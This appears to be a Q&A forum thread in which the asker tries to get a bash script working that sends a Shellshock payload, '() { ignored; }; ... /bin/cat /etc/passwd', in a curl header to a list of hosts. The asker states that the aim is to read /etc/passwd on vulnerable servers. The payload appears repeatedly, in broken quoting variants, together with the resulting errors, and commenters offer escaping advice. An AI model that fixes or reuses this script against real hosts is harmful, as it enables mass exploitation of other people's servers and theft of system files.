# Bash shell script, special characters and passing arguments to curl

Tags: bash, shell, command

I am trying to pass some shell commands from within my script to curl, however one argument in curl uses a special character namely a quotation mark, i tried escaping the quotation mark with backslash but this gives me another error.

Consider the following:

```
`cat $list | xargs curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd | printf %b \n`
```

When this gets executed i get the following error message.

```
$myscript.sh: command substitution: line 32: syntax error near     unexpected token `('
$myscript.sh: command substitution: line 32: `cat $list | xargs curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd | printf %b \n
```

When i run this command from my bash shelll it executes without issue.

`curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd`

Provided i manually supply a host, as you can tell in my script the `$list` var will be supplying a list of hosts to be tested.

Also;

I googled for command substitution errors but couldn't seem to find how it was relevant in my case, frankly i'm quite new at bash so that might have been part of the problem.

Any help would be greatly appreciated, thanks in advance.

EDIT: Ok i've been working on the issue, and have tried escaping all special characters. New code:

```
`cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`
```

Now after running my script curl outputs the following.

> curl: (3) [globbing] unmatched brace at pos 2
>
> % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
>                                    Dload  Upload   Total   Spent    Left  Speed
>     0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--
>
> 0curl: (6) Could not resolve host: ignored
>   100 12037    0 12037    0     0  10421      0 --:--:--  0:00:01 --:--:-- 19254
>   100  5722    0  5722    0     0   6113      0 --:--:-- --:--:-- --:--:--  8341

`Could not resolve host: ignored` Leads me to believe curl is trying to resolve a host named "ignored" which is strange since it should be passing the contents of the `$list` var via `xargs` to curl and `$list` contains a list of hosts.

Besides this i am getting a new error message

`myscript.sh: line 32: };: command not found
myscript.sh: line 32: <!DOCTYPE: command not found`

I am basically at a loss, i'd be willing to post the entire script if any of you think that would be helpful.

Thanks guys.

Comment: Based on the error it seems the offending character is the ( not the quote mark. Have you tried escaping all special characters?

Comment: I have not yet considered that, i will try that now and report back.

Comment: Alright i have escaped all special characters including brackets as it appears those were 
interferring with the operation of the script as well the code looks like this now.

`cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd | printf %b \n`

My output was as follows:

`curl: (3) [globbing] unmatched brace at pos 2`
        myscript.sh: line 32: }: command not found
        /bin/cat: /etc/passwd: No such file or directory
        myscript.sh: line 32: <!DOCTYPE: command not found

Comment: Please excuse my formatting i cannot seem to get it right.

Comment: You will need to escape the ; as well because that tells bash to start a new command. Also, if you edit your question instead of posting it in a comment it will format better.

Comment: What are you trying to accomplish? Is the command really supposed to be in backticks? Why??

Comment: I am trying to run shell commands from within a shellscript, backticks tell bash to treat everything between them as shell commands. What i am trying to accomplish with this script is sending the command `cat etc/passwd` to a list of hosts vulnerable to shellshock via curl.

Comment: @NullCoder Backticks are only necessary to capture the output of a command, e.g., `foo=$(cmd)` sets `foo` equal to the output of `cmd`. They aren't necessary simply to run a command.

Comment: You say _When i run this command from my bash shelll it executes without issue.

`curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd`_ - Excuse me, but that's not credible. Unescaped `()` may not appear in the middle of a command. You should review and post which working command you really ran.